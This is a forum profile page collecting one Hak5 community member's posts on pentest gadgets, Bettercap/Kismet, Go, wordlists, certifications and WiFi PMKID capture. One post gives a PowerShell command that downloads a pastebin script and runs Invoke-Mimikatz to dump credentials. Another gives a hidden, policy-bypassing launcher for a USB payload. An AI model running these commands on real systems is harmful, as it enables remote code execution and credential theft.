Jump to content

PoSHMagiC0de

Dedicated Members
  • Posts

    618
  • Joined

  • Last visited

  • Days Won

    26

Posts posted by PoSHMagiC0de

  1. We are going to need a VM to compile this and redistribute onto the bunny.  You can get the compiling going by install build-essential with aptitude but the Bunny chokes on the compilation on different parts different times.  It cannot handle it.  If you want to continue to try then apt install build-essential while inet sharing and try the pip install -r requirements.txt again to see if it compiles.  You will also need to pip install --upgrade setuptools to get rid of another error.

    I gave up when I saw it was compiling as I know any compilation I did on the bunny that pushed it usually locks up.

     

  2. Wait, you launching powershell from within powershell?  If you are, that is your issue.  Depending on what you are trying to do, you will have to do  it differently.

    If ran from the command line that will work.  But if within Powershell then the below will need to be done.

    Start-Process "Powershell" -argumentlist "/C `"IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/FvASwLVQ');Invoke-Mimikatz -DumpCreds`""

    But if you are already in Powershell, I do not see the need for the above.

  3. You can or you can ssh into it and work on the command line if you are L33t enough.  It has an internal web interface on the Pineapple.  It is not served from their site.  I believe the dashboard does connect to their portal which just to pull down news.

    • Like 1
    • Upvote 1
  4. Yeah.....

    I read through this thread twice and still got lost.  If I read it correctly from the original question, it is asked why Hak5 products are tied to their servers.  Well, they are not.  The BashBunny, RUbbr ducky, and all their stuff does not require you to speak back to their server.  If you want new firmware and stuff, you can download it and install it but usage does not require..nor does it..talk back to Hak5.  The Cloud C2 might and if it does, it will be for product registration since that is one of their only products that has a free and paid tier so it has licenses.

    So, I do not know of any Hak5 hardware that has a mandatory umbilical back to them.  Support you get is all manual.  Manual calling/emailing them and manually downloading and installing updates.  Hmm, I think the Pineapple speaks back to their server but only to return if there are updates and I believe there is an option to turn that off.

  5. I parsed through the Go code real quick for Bettercap and see there is no output except to the console for gps data.  Not even a rest api for it else I would suggest  building a service in whatever language you want that can hit the rest api of bettercap to query that data on a time interval.  For something like this, kismet might be a better choice.  Setup kismet as sensor on your remote devices that can communicate to a kismet instance that is the server.  Though, I wouldn't shoot that openly across the inet.  Maybe create VPN or SSH tunnels back to server and server it through there?  Have the kismet listener listening on local host only for the ssh tunnel or the private vpn network for vpn tunnel.  You get it. 

  6. Hey Mubix,

     

    When you are back, you should do a show on using Metasploit to get into an AD domain machine, deliver Empire for post exploitation or deliver Empire as a payload for metaploit's initial exploit. Use BloodhoundAD to find a way to elevate somewhere and then initiate elevation.

    That should keep the questions rolling in for a bit.

  7. Soooo @Darren Kitchen

    I was going to send you a solution but YouTube comment space is too small for what I was posting and you do not take PMs here.  Totally understandable. 😛

    Actually, I wanted to post it silently because if I win and the prize is a BB, I already got one and would rather the second runner up get it.  I just like solving the problem.  🙂

    Now, if you want to start a Hak5 credit account for me so I can earn up to the amount I need to get a Tetra, well I am down heheh.

     

    How do I send you a solution silently?

     

  8. You can also get is VPS like Digital Oceans (Bithost is the same thing but with bitcoin) and use the roadwarrior script to setup a quick SSLVPN of your own before heading out and then use that with openvpn to hide your traffic.

     

  9. One thing I have done with crunch as an experiment to targeted wordlist generation is take a sample wordlist of a target.  From that get a list of all unique characters of list (to prevent repetition we do no need and will not make sense).  I then choose a minimum word size and max word size I think the word or phrase will be.  I be sure to include a space in the character list so phrases can be generated.  From that you can generate smaller wordlists only using characters from words you think make up their password using crunch.

     

  10. Hey,

     

    Anyone try out Go yet?  Watched a 8 hour youtube video on it (not all at once of course) and been messing with it for almost a month.  I like it.  I like C but hate the tediousness of it sometimes if you want to do something simple.  I like dynamic languages like Python that make it easy to do a lot of things without thinking too hard but hate it doesn't have strict typeness when I want it at runtime unless I implement my own methods of insuring it.

    Go gives me both and the simple concept of concurrency in it is a plus because we all love trying to handle sharing data among threads.  🙂

    Who else has given this language a "Go"?

    See what I did there?  😛

     

  11. Try this:

    powershell -NoP -NonI -W Hidden -Exec Bypass -C "$u=(gwmi win32_volume -Filter {Label='PD'}).Name;cd $u;.\d.cmd;"
    

    You passed the name already.  No need to reference it in the variable.  Surprised it even works in your stand alone tests unless you are already in the folder with the d.cmd file.

    Also, to remove the extra (") that might be terminating the string you can use "{}" for the filter statement in powershell.

     

  12. hcxdumptool doesn't quit when it has the pmkid plus there is one more tool needed to convert what hcxdumptool gets to a hashcat crackable formatted hash.

    I looked into automating these but not so simple.  I have been messing with scapy with 802.11 and it maybe possible to automate this in python.

    You will need to setup a channel hopping beacon capture part to get access points.  You will need to setup a thread after that to handle association with scapy and monitor it once APs are found.  You will need a thread to begin authentication but not finish.  The pmkid is usually sent when the AP sends its ANounce.  You will just need to figure out how to create the 16800 hash that hashcat can understand to pass it to hashcat.  I been busy with a talk for a DevFest that happened here but am free and might look into this.  It maybe possible though depending on if you can get association and all that working.  You could try aireplay-ng for the association but it doesn't return anything to let you know if it is associated (no error codes or stuff).  if the AP os mac filtering then this can be an issue.

  13. Looks like we are going to have to start rolling our own crypto or use older version of "non backdoored" versions.

    Government always want to look at people's nudie pics and porno behind their back.  Tell them to go find their own porno.  Perverted gov agents.

  14. I am leaning the direction of @barry99705

     

    I was the type to push everyone toward college back in the day but now I have been more picky as to when you need to spend half your life on a student loan if you do not have to.  School versus payoff these days has gotten tough when it comes to loans so I always try to steer people from them if they can attain the knowledge just as well from other means but that is just my background when it comes to education these days.  Though I still believe in obtaining knowledge.

    Now, with that.  My job put me through the CeHv9 course.  I have practice exams and from people who paid to take the test for the cert and the practice exams I lost interest in a CeH cert.  Nothing to do with the difficulty of the test.  Doesn't seem hard.  It was just the content of the tests and those wacky throw-ins (which are in the practice too) just made it feel like the industry tried to standardize hacking.  It was watered down and made me feel someone with no real world experience can get one of these and be mistaken for a security expert, like an MCSE :tongue:.  If you want a cert, aim for the OSCP if you have to spend money on a qualification.  From what I seen of it, it shows real world knowledge and you can even learn from it if you fail vs a CeH if you fail means you have to go memorize more stuff.

    I am not knocking on those who already have the CeH cert.  Even I was going down that path to have a piece of paper to satisfy some industry goons.  Ultimately, I am settling on getting OSCP type of certs as they have shown to attain them you have to show some sort of real world competence in the field.  I say "hack" together your own learning and education path.

     

  15. Tried it, it works.  Better if you use the parameters --filtermode=2 --filterlist=<text file with bssids you are targeting>

    Else it goes after every beacon it hears.  You also have to manually break when you see that status say pownd=1 as it means it has gotten a PMKID.

     

    Have to check if there is a param to quit after 1 pmkid is captured for automation.

     

    • Like 1
  16. Maybe a yagi and a wifi amp?

     

    I built me a couple of cantennas from stainless steel toilet brush holders and mounted them to tripods.  Good range directionally.  I am waiting for a 3000mW 35db amp to come in this week to see if I can make it go even further.

    For extreme ranges you will need a directional antenna which seems to work good and maybe an amp if you want to get more.

     

    Heck on amazon you can get some huge wifi amps and a parabolic dish if you are that serious.

×
×
  • Create New...